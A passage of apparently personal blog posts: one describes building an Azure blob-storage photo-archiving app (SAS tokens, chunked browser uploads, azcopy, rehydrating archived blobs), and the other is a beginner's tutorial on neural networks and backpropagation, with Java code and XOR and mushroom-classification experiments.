The upload code lives here in index.html. The use of a hidden file input is cute but not essential — it just gives us a little more control over the ux. Of course, calls to storage methods need to be authenticated; our approach is to ask our server to generate a “shared access signature” (SAS) token tied to the blob we’re trying to upload — which happens in freezer.js (double-duty for upload and download). The authenticated URL we return is tied only to that specific file, and only for the operations we need.
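
Minting that SAS on the server boils down to something like this (account, container and blob names are parameters here just to keep the sketch simple):

    // rough sketch of minting a blob-scoped SAS on the server
    const { StorageSharedKeyCredential, BlobSASPermissions,
            generateBlobSASQueryParameters } = require("@azure/storage-blob");

    function getUploadUrl(accountName, accountKey, containerName, blobName) {

      const credential = new StorageSharedKeyCredential(accountName, accountKey);

      const sas = generateBlobSASQueryParameters({
        containerName: containerName,
        blobName: blobName,
        permissions: BlobSASPermissions.parse("racw"),      // create/write, no delete
        expiresOn: new Date(Date.now() + (60 * 60 * 1000))  // good for an hour
      }, credential);

      return(`https://${accountName}.blob.core.windows.net/` +
             `${containerName}/${blobName}?${sas.toString()}`);
    }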

The code then calls the SDK method BlockBlobClient.uploadData to actually push the data. This is the current best option for uploading from the browser, but to find it you have to make your way through a bunch of other methods that are either gone, deprecated or only work in the node.js runtime. The quest is worthwhile, though, because there is some good functionality tucked away in there that is key for large uploads (there’s a quick browser-side sketch after this list):

  • Built-in retries (we beef this up with retryOptions).
  • Clean cancel using an AbortController.
  • A differentiated approach for smaller files (upload in one shot) vs. big ones (upload in chunks).
  • When uploading in chunks, parallel upload channels to maximize throughput. This one is tricky — since most of us in the family use Chrome, we have to be aware of the built-in limitation of five concurrent calls to the same domain. In the node.js runtime it can be useful to set the “concurrency” value quite high, but in the browser environment that will just cause blocked requests and timeout chaos. This took me a while to figure out … a little mention in the docs might be nice, folks.
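
Put together, the browser-side call looks more or less like this; the SAS URL comes back from our API, and the specific numbers are just the kind of values I ended up twiddling, not gospel:

    // sketch only: push a File object straight to blob storage using a SAS URL
    const { BlockBlobClient, AnonymousCredential } = require("@azure/storage-blob");

    async function uploadFile(sasUrl, file, abortController) {

      const blobClient = new BlockBlobClient(sasUrl, new AnonymousCredential(), {
        retryOptions: { maxTries: 5 }                 // beefed-up retries
      });

      await blobClient.uploadData(file, {
        abortSignal: abortController.signal,          // clean cancel
        maxSingleShotSize: 4 * 1024 * 1024,           // small files go in one shot
        blockSize: 8 * 1024 * 1024,                   // big ones go up in chunks
        concurrency: 4,                               // stay under the per-domain cap
        onProgress: (p) => console.log(`sent ${p.loadedBytes} bytes`)
      });
    }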

With all of this, uploading seems pretty reliable. Not perfect though — it still dies with frustrating randomness. Balancing all the config parameters is really important, and unfortunately the “best” values change depending on available upload bandwidth. I think I will add a helper so that folks can use the “azcopy” tool to upload as well — it can really crank up the parallelization and seems much less brittle with respect to network hiccups. Command-line tools just aren’t very family friendly, but for what it’s worth:

  1. Download azcopy and extract it onto your PATH.
  2. Log in by running azcopy login … this will tell you to open up a browser and log in with a one-time code.
  3. Run the copy with a command like azcopy cp FILENAME https://STORAGE_ACCT.blob.core.windows.net/CONTAINER/FILENAME --put-md5 --block-blob-tier=Archive.
  4. If you’re running Linux, it’s handy to do #3 in a screen session so you can detach and not worry about staying logged in.

Thawing

Remember that files in the Archive tier can’t be directly downloaded — they need to be “rehydrated” (I prefer “thawed”) out of Archive first. There are two ways to do this: (1) just flip the “tier” bit to Hot or Cool to initiate the thaw, or (2) make a duplicate copy of the archived blob, leaving the original in place but putting the new one into an active tier. Both take the same amount of time to thaw (about fifteen hours), but it turns out that #2 is usually the better option for cold-storage use cases. The reason why comes down to cost management — if you move a file out of archive before it’s been there for 180 days, you are assessed a non-trivial financial penalty (equivalent to if you were using an active tier for storage the whole time). Managing this time window is a hassle and the copy avoids it.

So this should be easy, right? Just call beginCopyFromURL with the desired active tier value in the options object. I mean, that’s what the docs literally say to do, right?

Nope. For absolutely no reason that I can ascertain online, this doesn’t work in the JavaScript client library — it just returns a failure code. Classic 2020 Microsoft developer experience … things work in one client library but not another, the differences aren’t documented anywhere, and it just eats hour after hour trying to figure out what is going on via Github, Google and Stack Exchange. Thank goodness for folks like this that document their own struggles … hopefully this post will show up in somebody else’s search and help them out the same way.

Anyways, the only approach that seems to work is to just skip the client library and call the REST API directly. Which is no big deal except for the boatload of crypto required. Thanks to the link above, I got it working using the crypto-js npm module. I guess I’m glad to have that code around now at least, because I’m sure I’ll need it again in the future.
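
For the record, the REST call itself is nothing special; it’s the SharedKey Authorization header that needs all the crypto. A stripped-down sketch (node-fetch and the buildAuthHeader helper are stand-ins, not code from the repo):

    // sketch of rehydrate-by-copy against the REST API
    const fetch = require("node-fetch");

    async function thawByCopy(accountUrl, container, blobName) {

      const source = `${accountUrl}/${container}/${blobName}`;
      const dest = `${accountUrl}/${container}/${blobName}.thawed`; // name is arbitrary

      const headers = {
        "x-ms-version": "2020-10-02",
        "x-ms-date": new Date().toUTCString(),
        "x-ms-copy-source": source,
        "x-ms-access-tier": "Hot"   // the copy lands in an active tier
      };

      // hypothetical helper: the SharedKey signature built with crypto-js
      headers["Authorization"] = buildAuthHeader("PUT", dest, headers);

      const response = await fetch(dest, { method: "PUT", headers: headers });
      if (!response.ok) throw new Error(`copy failed: ${response.status}`);
    }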

But wait, we’re still not done! Try as I might, the method that worked on my local development environment would not run when deployed to the server: “CryptoJS not found”. Apparently the emulator doesn’t really “emulate” very well. Look, I totally understand that this is a hard job and it’s impossible to do perfectly — but it is crystal clear that the SWA emulator was hacked together by a bunch of random developers with no PM oversight. Argh.

By digging super-deep into the deployment logs, it appeared that the Oryx build thingy that assembles SWAs didn’t think my API functions had dependent modules at all. This was confusing, since I was already dependent on the @azure/storage-blob package and it was working fine. I finally realized that the package.json file in the API folder wasn’t listing my dependencies. The same file in the root directory (where you must run npm install for local development) was fine. What the f*ck ever, man … duping the dependencies in both folders fixed it up.
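
In other words, the api folder needs its own package.json that actually lists what the functions depend on; something like this (versions illustrative):

    {
      "dependencies": {
        "@azure/storage-blob": "^12.8.0",
        "crypto-js": "^4.1.1"
      }
    }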

Downloading and Deleting

The last of our tasks was to implement download and delete — thankfully, not a lot of surprises with these. The only notable bit is setting the correct Content-Type and Content-Disposition headers on download, so that files are saved to disk rather than opened in the browser or whatever other application is registered. Hooray for small wins!
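
One convenient way to pull that off (not necessarily the only one) is to bake the response headers into the download SAS itself, so the storage service echoes them back on the GET. Building on the earlier SAS sketch:

    // when minting a download SAS, override the response headers so the
    // browser treats the blob as a file to save
    // (reuses credential / containerName / blobName from the sketch above)
    const sasValues = {
      containerName: containerName,
      blobName: blobName,
      permissions: BlobSASPermissions.parse("r"),
      expiresOn: new Date(Date.now() + (60 * 60 * 1000)),
      contentType: "application/octet-stream",
      contentDisposition: `attachment; filename="${blobName}"`
    };

    const sas = generateBlobSASQueryParameters(sasValues, credential);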

That’s All Folks

What a journey. All in all it’s a solid little app — and great functionality to ensure our family’s pictures and videos are safe. But I cannot overstate just how disappointed I am in the Microsoft developer experience. I am particularly sensitive to this for two reasons:

First, the fundamental Azure infrastructure is really really good! It performs well, the cost is reasonable, and there is a ton of rich functionality — like Static Web Apps — that really reduce the cost of entry for building stuff. It should be a no-brainer for anyone looking to create secure, modern, performant apps — not a spider-web of sh*tty half-assed Hello World tutorials that stop working the day after they’re published.

Even worse for my personal blood pressure, devex used to be the crown jewel of the company. When I was there in the early 90s and even the mid 00s, I was really, really proud of how great it was to build for Windows. Books like Advanced Windows and Inside OLE were correct and complete. API consistency and controlled deprecation were incredibly important — there was tons of code written just to make sure old apps kept working. Yes it was a little insane — but I can tell you it was 100% sincere.

Building for this stuff today feels like it’s about one third coding, one third installing tools and dependencies, and one third searching Google to figure out why nothing works. And it’s not just Microsoft by any means — it just hurts me the most to see how far they’ve fallen. I’m glad to have fought the good fight on this one, but I think I need a break … whatever I write next will be back in my little Linux/Java bubble, thank you very much.  

Fake Neurons Are Cool

Back when I was in college, getting a Computer Science degree meant taking a bunch of somewhat advanced math courses. My math brain topped out at Calc2, so clearly I was going to have to work the system somehow. Thus was born my custom-made “Cognitive Science” degree, a combination of the cool parts of Psychology with the cool parts of CS. Woot! My advisor in the degree was Jamshed Bharucha, who has done a ton of really cool work trying to understand how we perceive music.

In retrospect it was an awesome time to be learning about artificial intelligence. Most approaches still didn’t work very well (except in limited domains). The late-80s hype around expert systems had petered out, and the field overall was pretty demoralized. But blackboards and perceptrons were still bopping around, and I was particularly enamored with the stuff that Rodney Brooks (eventually of Roomba fame) was doing. What was great for a student was that all of these ideas were still relatively simple — you could intuitively talk about how they worked, and the math was approachable enough that you could actually implement them. Today it’s much harder to develop that kind of intuition from first principles, because everything is about mind-numbing linear algebra and layer upon layer of derivatives (on the other hand, today the algorithms actually work I guess).

Most notably for me, the classic 1986 backpropagation paper by Rumelhart / Hinton / Williams was just gaining traction as I was learning all of this. Backprop basically restarted the entire field and, coupled with Moore’s Law, set the stage for the pretty incredible AI performance we take for granted today. Dr. Bharucha saw this happening, and tapped me to write a graphical neural net simulator on the Mac that we used to teach classes. Sadly, while you can still find a few obscure mentions of DartNet around the web (including a tiny screenshot), it seems that the code is lost — ah well.

Nostalgia aside, I have been noodling an idea for a project that would require a network implementation. There are a metric ton of really, really good open source options to choose from, but I realized I didn’t really remember the details of how it all worked, and I don’t like that. So with the help of the original paper and some really nice, simple reference code I set about to get refreshed, and figured that others might enjoy a “101” as well, so here we go.

Real Neurons are Really Cool

We do our thinking thanks to cells called Neurons. In combination they are unfathomably complex, but individually they’re pretty simple, at least at a high level. Neurons basically have three parts:

image credit w/thanks to Wikimedia
  1. The cell body or soma, which holds the nucleus and DNA and is a lot like any other cell.
  2. Dendrites, branching tendrils which extend from the cell body and receive signals from other cells.
  3. The axon, a (usually) single long extension from the cell body that sends signals to other cells.

Neurons are packed together so that axons from some neurons are really close to dendrites from others. When a neuron is “activated”, its axon releases chemicals called neurotransmitters, which travel across the gap (called a synapse) to nearby dendrites. When those dendrites sense neurotransmitters, they send an electrical pulse up towards their cell body. If enough dendrites do this at the same time, that neuron also “activates”, sending the pulse up the axon which responds by releasing more neurotransmitters. And she tells two friends, and she tells two friends… and suddenly you remember your phone number from 1975.

It doesn’t quite work this way, but imagine you’ve got a neuron in your head dedicated to recognizing Ed Sheeran. Dendrites from this neuron might be connected to axons from the neuron that recognizes redheads, and the one for Cherry Seaborn, and the one for British accents, and dozens of others. No single dendrite is enough to make the Ed Sheeran neuron fire; it takes a critical mass of these inputs firing at the same time to do the job. And some dendrites are more important than others — the “shabbily dressed” neuron probably nudges you towards recognizing Ed, but isn’t nearly as powerful as “hearing Galway Girl”.

Pile up enough neurons with enough connections and you end up with a brain. “Learning” is just the process of creating synapses and adjusting their strengths. All of our memories are encoded in these things too. They’re why I think of my grandparents’ house every time I smell petrichor, and why I start humming Rocky Mountain High whenever I visit Overlake Hospital. It’s just too freaking amazing.

Fake Neurons

People have been thinking about how to apply these concepts to AI since the 1940s. That evolution itself is fascinating but a bit of a side trip. If we fast-forward to the early 1980s, the state of the art was more-or-less represented in Minsky and Papert’s book Perceptrons. In brief (and I hope I don’t mess this up too much):

  1. Coding a fake neuron is pretty easy.
  2. Coding a network of fake neurons is also pretty easy, albeit computationally intense to run.
  3. Two-layer, fully-connected networks that link “input” to “output” neurons can learn a lot of things by example, but their scope is limited.
  4. Multi-layer networks that include “hidden” neurons between the inputs and outputs can solve many more problems.
  5. But while we understood how to train the networks in #3, we didn’t know how to train the hidden connections in #4.

The difference between the networks in #3 and #4 is about “linearity”. Imagine your job is to sort a pile of random silverware into “forks” and “spoons”. Unfortunately, you discover that while many pieces are pretty obviously one or the other, there are also a bunch of “sporks” in the mix. How do you classify these sporkish things? One super-nerdy way would be to identify some features that make something “forky” vs. “spoony” and plot examples on a chart (hot tip: whenever you see somebody building “graphs” in PowerPoint as I’ve done here, you should generally assume they’re full of crap):

If we measure the “tine length” and “bowl depth” of each piece, we can plot it on this graph. And lo and behold, we can draw a straight line (the dotted one) across this chart to separate the universe quite accurately into forks and spoons. Sure, the true sporks in the lower-left are tough, as are weirdo cases like the “spaghetti fork” represented by the misclassified red dot on the right. But by and large, we’ve got a solid classifier here. The dividing line itself is pretty interesting — you can see that “tine length” is far more “important” to making the call than the bowl depth. This makes intuitive sense — I’ve seen a lot of spoon-shaped forks, but not a lot of spoons with long tines.

This kind of classification, where a straight line splits the categories, is called “linear classification,” and it is super-super-powerful. While it’s hard for us to visualize, it will work with any number of input parameters, not just two. If you imagine adding a third dimension (z axis) to the chart above, a flat plane could still split the universe in two. A whole bunch of AI you see in the world is based on multi-dimensional linear classifiers (even the T-Detect COVID-19 test created by my friends at Adaptive).
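
In equation form, that dotted line is nothing more than a weighted sum compared against a threshold (the w weights and bias b here are generic symbols, not values from my chart):

    \text{call it a fork when}\quad
    (w_1 \times \text{tine length}) + (w_2 \times \text{bowl depth}) + b > 0

The learned weights capture exactly that “importance” business: with data like this, the weight on tine length ends up much larger than the weight on bowl depth, and the bias b just shifts the line around.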

But there are a bunch of things linear classifiers can’t do — a good example being complex image recognition (dog or fried chicken?). Enter the multi-layered neural network (#4 in the list above). Instead of straight lines, these networks can draw distinctions using complex curves and even disjoint shapes. Super-cool … except that back in the early 80s we didn’t know how to train them. Since carefully hand-crafting a network with thousands of connections is laughable, we were kind of stuck.

I already gave away the punchline — in 1986 some super-smart folks solved this dilemma with a technique they called “backpropagation.” But before we dig into that, let’s look a little more closely at how artificial neural nets are typically put together.

Network Layers and Forward Propagation

I alluded to the fact that our brains are generally a jumble of interconnected neurons. Some connections are predetermined, but most come about as we learn stuff about the world. The interconnectedness is massively complex — our artificial versions are much simpler, because we’re just not as smart as Nature. Still, there is a lot going on.

Fake neurons are arranged into “layers”, starting with the input layer. This input layer is where features (tine length, etc.) are presented to the system, usually as floating point numbers and ideally normalized to a consistent range like 0 to 1 (normalizing the inputs lets the network assess the importance of each feature on its own). The last layer in a network is the “output” layer, which is where we read out results. The output layer might be a single neuron that provides a yes/no answer; or it might be a set of neurons, each of which assesses the probability that the inputs represent a particular thing; or it might be something in between those two designs.

In between these two layers is usually at least one “hidden” layer. The number of neurons in these layers is up to the network designers — and there aren’t a ton of “rules” about what will work best in any specific situation. This is true of most “hyperparameters” used to tune AI systems, and selection usually comes down somewhere between a random guess and trying a whole bunch to see what performs the best. And we think we’re so smart.

Every neuron in layer N is connected via an artificial synapse to every neuron in layer N + 1. The “strength” of each synapse is represented by a floating-point value called a “weight”. Generating an output from a given set of inputs is called a “forward pass” or “forward propagation” and works like this:

  1. Assign each input value to the input neurons.
  2. For each neuron N in the first hidden layer,
    1. For each neuron N’ in the layer below, calculate the value sent from N’ to N by multiplying the value of N’ with the weight of the synapse between them.
    2. Sum these values together to get the total input value for neuron N.
    3. Add the “bias” value of N to the sum. Intuitively this bias allows each neuron to have a “base level” importance to the system.
    4. Apply an “activation” function to the sum to determine the final output value of N (see discussion of activation functions below).
  3. Repeat step 2 for each subsequent network layer until the output layer is reached.

Activation functions are interesting. In a very practical sense, we need to normalize the output values of each neuron — if we didn’t, the “sum” part of the algorithm would just keep growing with every layer. Using a non-linear function to perform that normalization enables the non-linear classification we’re trying to build. Remember that real neurons are binary — they either fire or they do not — a very non-linear operation. But artificial networks tend to use something like the sigmoid function (or ever more complicated ones these days), which has the added benefit of a cheap, well-behaved derivative, exactly what you want for a learning approach called gradient descent (I know, more terms … sorry, we’ll get there).
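
For reference, the sigmoid and its famously tidy derivative look like this:

    \sigma(x) = \frac{1}{1 + e^{-x}}
    \qquad\qquad
    \sigma'(x) = \sigma(x) \, (1 - \sigma(x))

That second line is the win: once you’ve computed a neuron’s output, its derivative is one multiply away, which keeps the training loop cheap.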

It’s hard to describe algorithms in English. Hopefully that all made sense, but said more simply: artificial neural networks arrange neurons in layers. Activation of the neurons at each layer is calculated by adding up the activations from the layer below, scaled by weights that capture the relative importance of each synapse. Functions transform these values into final activations that result in non-linear output values. That’s good enough.

Training the Network / Enter Backpropagation

Backprop is one of those algorithms that I can fight through with pen and paper and really understand for about five seconds before it’s lost again. I take some pride in those five seconds, but I wish I was better at retaining this stuff. Ah well — I can at least hold onto an intuitive sense of what is going on — and that’s what I’ll share here.

We can train a network by showing it a whole bunch of input samples where we know what the output should be (this is called supervised learning). The network is initialized with a set of totally random weights and biases, then a forward pass is done on the first sample. If we subtract the (pretty much random) outputs we get from the correct/expected results, we get an “error” value for each output node. Our goal is to use that error plus a technique called “gradient descent” to adjust the weights coming into the node so that the total error is smaller next time. Then we run the other samples the same way until the network either gets smart or we give up.

Gradient descent is a very simple idea. Considering one synapse (weight) in our network, imagine a chart like the one here that plots all the possible weight values against the errors they produce. Unless the error is totally unrelated to the weight (certainly possible but then it is all random and what’s the meaning of life anyways), you’ll end up with a curve, maybe one like the dotted line shown below. Our job is to find the weight value that minimizes error, so we’re trying to hit that lower trough where the green dot is.

If our initial random stab is the red dot, we want to move the weight “downhill” to the left. We don’t know how far, but we can see that the slope of the curve is pretty steep where we are, so we can take a pretty big step. But oops, if we go too far we end up missing the bottom and land somewhere like the gold dot. That’s ok — the slope is shallower now, so we’ll try again, taking a smaller step to the right this time. And we just keep doing that, getting closer and closer to the bottom where we want to be.

Alas, the big problem with gradient descent is represented by the purple dot, called a “local minimum”. If our initial random weight puts us near that part of the curve, we might accidentally follow it downhill to the purple and get “stuck” because the slope there is zero and we never take a big enough step to escape. There are various ways to minimize (ha) this problem, all of which amount in practice to jiggling the dot to try and shake it loose. Fun stuff, but I’m just going to ignore it here.

Anyways, it turns out that something called the “chain rule” lets us figure out the rate of change of the error at each output node with respect to each incoming weight value. And once we know that, we can use gradient descent to adjust those weights just like we did with the red dot. And it also enables us to iteratively distribute errors through the lower layers, repeating the process. I would just embarrass myself trying to explain all the math that gets us there, but I grasped it just long enough to implement it here.
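
For the notation-curious, here is roughly what all that math buys us (using my own loose symbols): for a weight w_ij connecting node i up to node j, each training sample nudges it by

    \Delta w_{ij} = \eta \, \delta_j \, a_i
    \qquad\text{where}\qquad
    \delta_j =
    \begin{cases}
      (t_j - a_j) \, \sigma'(\cdot) & \text{for output nodes} \\
      \sigma'(\cdot) \, \sum_k w_{jk} \, \delta_k & \text{for hidden nodes}
    \end{cases}

Here η is the learning rate, a is a node’s activation, t is a target output value, and the recursive δ for hidden nodes is the “propagation” part: each layer’s blame is computed from the layer above it. This maps directly onto the trainOne method below.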

Again trying to wrap all this up, in short we train a network by (a) computing how poorly it performs on known input/output combinations, (b) divvying up that error between the synapses leading to the outputs and using that to update weight values, then (c) iteratively pushing the error to the next lower layer in the network and repeating the process until we get to the bottom. Do this enough times and we end up with a network that (usually) does a good job of classification, even on inputs it hasn’t seen before.

Show Me the Money (Code)

Matrix math bugs me. OK, mostly I’m jealous of the way other folks toss around “transposes” and “dot products” and seemingly know what they’re talking about without sketching out rows and columns on scrap paper. I suspect I’m not alone. But it turns out that having a solid Matrix class really simplifies the code required for working with fake neurons. So that’s where we’ll start, in Matrix.java. There is absolutely nothing exciting in this file — it just defines a Matrix as a 2D array of doubles and provides a bunch of super-mechanical operations and converters. I like the vibe of the iterate and transform methods, and it’s helpful to understand how I coded up equality tests, but really let’s move on.

Network.java is where all the magic really happens. Network.Config defines parameters and can also fully hydrate/dehydrate the state of weights and biases. One thing to be careful of — I put in a little hook to provide custom activation functions, but right now the code ignores that and always uses sigmoid. Beyond all of that housekeeping, there are three bits of code worth a closer look: forwardPass, trainOne and trainAndTest:

There are two versions of the forwardPass method: a public one that just returns an output array, and an internal one that returns activation values for all neurons in the network. That internal one does the real work and looks like this:

	private List<Matrix> forwardPassInternal(double[] input) {

		List<Matrix> results = new ArrayList<Matrix>();
		results.add(new Matrix(input, 0, cfg.Layers[0]));

		for (int i = 0; i < weights.size(); ++i) {

			Matrix layer = weights.get(i).multiply(results.get(i));
			layer.add(biases.get(i));
			layer.transform(v -> activation.function(v));

			results.add(layer);
		}

		return(results);
	}

The “results” list has one entry for each layer in the network, starting with input and ending with output. Each entry is a Matrix, but keep in mind that it’s really just a simple array of activation values for each neuron at that layer (rows = # of neurons, columns = 1). We initialize the list by copying over the input activation values, then iterate over each layer computing its activation values until we get to the output. This is just an actual implementation of the forward propagation pseudocode we discussed earlier.

Training is also just a few lines of code, but it is a bit harder on the brain:

	public void trainOne(double[] vals) {

		// forwardprop

		List<Matrix> results = forwardPassInternal(vals);

		// backprop
		
		Matrix errors = new Matrix(vals, numInputs(), numInputs() + numOutputs());
		errors.subtract(results.get(results.size() - 1));

		for (int i = weights.size() - 1; i >= 0; --i) {

			// figure out the gradient for each weight in the layer
			Matrix gradient = new Matrix(results.get(i+1));
			gradient.transform(v -> activation.derivative(v));
			gradient.scale(errors);
			gradient.scale(cfg.LearningRate);

			// do this before updating weights
			errors = weights.get(i).transpose().multiply(errors);

			// the actual learning part!
			Matrix weightDeltas = gradient.multiply(results.get(i).transpose());
			weights.get(i).add(weightDeltas);
			biases.get(i).add(gradient);
		}
	}

The input to this function is a single array that holds both input and expected output values. Having both in one array is kind of crappy from an interface design point of view, but you’ll see later that it makes some other code a lot easier to manage. Just hold in your head that the inputs start at index 0, and the expected outputs start at index numInputs().

In brief, we take the output from forwardPassInternal and compute errors at the output layer. We then iterate backwards over each set of synapses / weights, computing the rate of change of each error with respect to its incoming weight, scaling that by our learning rate and the incoming activation, and finally adjusting the weights and bias. All of this crap is where the Matrix operations actually help us stay sane — but remember underneath each of them is just a bunch of nested array traversals.

If you’re still with me, the last important bit is really just scaffolding to help us run it all. I won’t copy all of that code here, but to help you navigate:

  1. Input is provided to the method with a TrainAndTestConfig object that defines key parameters and points at the training data file. The data file must be in TSV (tab-separated value text) format, with one row per test case. The columns should be inputs followed by expected outputs — all double values. Note you can provide additional columns to the right that will be passed through to output — these are meaningless to the algorithms but can be a useful tracking tool as we’ll see in the Normalization section later.
  2. The HoldBackPercentage specifies how much of the training set should be excluded from training and used to test performance. If this value is “0”, we train and test with the full set. This is useful for simple cases, but is typically considered bad practice because we’re trying to build a generalized model, not just one that can spit back cases it’s seen before. The train and test sets are selected randomly.
  3. Once we get the train and test sets figured out, starting at line 412 we finally instantiate a network and train for the number of iterations specified in the configuration file. The code tries to cover all of the training cases while keeping the order of presentation random; probably could be better here but it does the job.
  4. Then at line 428 we run each row from the testSet and produce an array that contains the inputs, outputs, expected outputs, computed errors and (if provided) extra fields. That array gets written to standard output as a new TSV. If cfg.FinalNetworkStatePath is non-null, we dehydrate the network to yet another file, and we’re done.

Let’s Run It Already

You can pretty easily build and run this code yourself. You’ll need git, maven and a JDK installation, then just run:

git clone https://github.com/seanno/shutdownhook.git
cd shutdownhook/toolbox && mvn clean package install
cd ../evolve && mvn clean package
cd datasets
./trainAndTest.sh xor

Here’s some slightly-abridged output from doing just that:

“XOR” is the classic “hello-world” case for backpropagation. It’s a non-linear function that takes two binary inputs and outputs “1” when exactly one input is 1, otherwise “0” (represented by in0, in1, and exp0 in the left highlighted section above). The test files xor-config.json and xor-data.tsv in the datasets directory configure an XOR test that uses a network with one hidden layer of eight neurons, trains over 100,000 iterations and tests with the full data set.

Our little network did pretty good work! The “out0” column shows final predictions from the network, which are very very close to the ideal 0 and 1 values. The right-side highlight gives a good sense of how the network learned over time. It shows the average error at intervals during training: our initial random weights were basically a coin flip (.497), with rapid improvement that flattens out towards the end.

I mentioned earlier that setting “hyperparameters” in these models is as much an art as a science. It’s fun to play with the variables — try changing the learning rate, the number of hidden layers and how many neurons are in each of them, and so on. I’ve found I can burn a lot of hours twiddling this stuff to see what happens.

Normalization

So XOR is cute, but not super-impressive — let’s look at something more interesting. Way back in 1987 Jeff Schlimmer extracted observable data on a bunch of poisonous and edible mushrooms from the Audubon Society Field Guide. More recently in 2020, some folks refreshed and expanded this dataset and have made the new version available under a Creative Commons license — 61,069 training samples, woo hoo! Many thanks to Wagner, Heider, Hattab and all of the other folks that do the often-underappreciated job of assembling data. Everybody loves sexy algorithms, but they’re useless without real-world inputs to test them on.

OK, go big or go home — let’s see if our network can tell us if mushrooms are poisonous. Before we can do that, though, we need to think about normalization.  

The mushroom data set has twenty input columns — some are measurements like “cap-diameter,” others are labels like “gill-spacing” (“c” = close; “w” = crowded; “d” = distant). But our Network model requires that all inputs are floating-point values. Before we can train on the mushroom set, we’ll have to somehow convert each input variable into a double.

The measurements are already doubles, so you might think we can just pass them through. And we can, but there’s a problem. An example — the maximum cap-diameter in the data set is about 62cm, while the max stem-height is just over half of that at 34cm. If we pass through these values unaltered, we will bias the network to treat cap-diameter as more important to classification than stem-height, simply because we’re just pushing more activation into the machine for one vs the other.

To be fair, even if we are naïve about this, over time the network should learn to mute the effect of “louder” inputs. But it would take a ton of training iterations to get there — much better to start from an even playing field. We do this by normalizing all of the inputs to a consistent range like 0 to 1. This is simple to do — just find the minimum and maximum values for each numeric input, and scale inputs at runtime to fit within those bounds. Not too bad.
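
In symbols, that min-max scaling is just:

    x_{normalized} = \frac{x - x_{min}}{x_{max} - x_{min}}

Every measurement lands between 0 and 1, with the original minimum and maximum pinned to the endpoints.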

But what about the label-based inputs like “gill-spacing?” “Close”, “crowded” and “distant” don’t naturally fit any numeric scale — they’re just descriptions of a feature. One option is to search the input for all unique values in each column, and then assign each one an evenly-spaced value between 0 and 1, e.g.:

  • Close = c = 0
  • Crowded = w = 0.5
  • Distant = d = 1

The only problem with this approach is that the numbers are assigned in arbitrary order. Remember back to forks and spoons — we’re trying to find lines and curves that segment the input space into categories, which works best when “similar” inputs are close to each other. This makes intuitive sense — a mushroom with a 1cm cap-diameter is more likely to be related to one measuring 1.2cm vs 40cm.

In the gill-spacing case above, the order shown is actually pretty good. But how would you arrange a “cap-surface” value of fibrous, grooved, scaly or smooth? Sometimes we just have to do the best we can and hope it all works out. And surprisingly, with neural networks it usually does.

Of course, in most real-world data sets you also have to decide how to deal with missing or malformed data in your set. But we’ve covered a ton of ground already; let’s leave that for another day.

Normalize.java has our implementation of all of this as used for the mushroom dataset. It tries to auto-detect column types, assigns values, and outputs the normalized data to a new file. It can also provide a data dictionary to aid in reverse engineering of network performance.

So are we mushroom experts now?

I ran trainAndTest.sh with the normalized data and a network configured for two hidden layers of forty neurons and a 5% holdback — the results after 2M training iterations are pretty amazing! The graph shows average error by iteration along the way — just as with XOR we start with a coinflip and finish far better; our average error is just 0.009. If we bucket our outputs using .5 as the threshold, we’d be incorrect in only 8 out of 3,054 samples in the test set — a 99.7% success rate — not too shabby.

Of the eight we missed, the good news I suppose is that we failed “the right way” — we called edible mushrooms poisonous rather than vice versa. Unfortunately this wasn’t always true in other runs — I saw cases where the network blew it both ways. So do you eat the mushroom using a classifier that is 99.7% accurate? It turns out that in this case you don’t have to face that hard question — the authors got to 100% success using a more complex learning model called a “random forest” — but risk and philosophical grey areas always lurk around the edges of this stuff, just like with human experts.

Whew — a lot there! But you know, we’re only caught up to about 1990 in the world of artificial intelligence. The last few years especially have seen an explosion in new ideas and improved performance. I am perfectly confident reaching into the back seat to grab a soda while my Tesla does the driving for me — at 75mph on a crowded highway. Seriously, can you believe we live in a world where that happens? I can’t wait to see what comes next.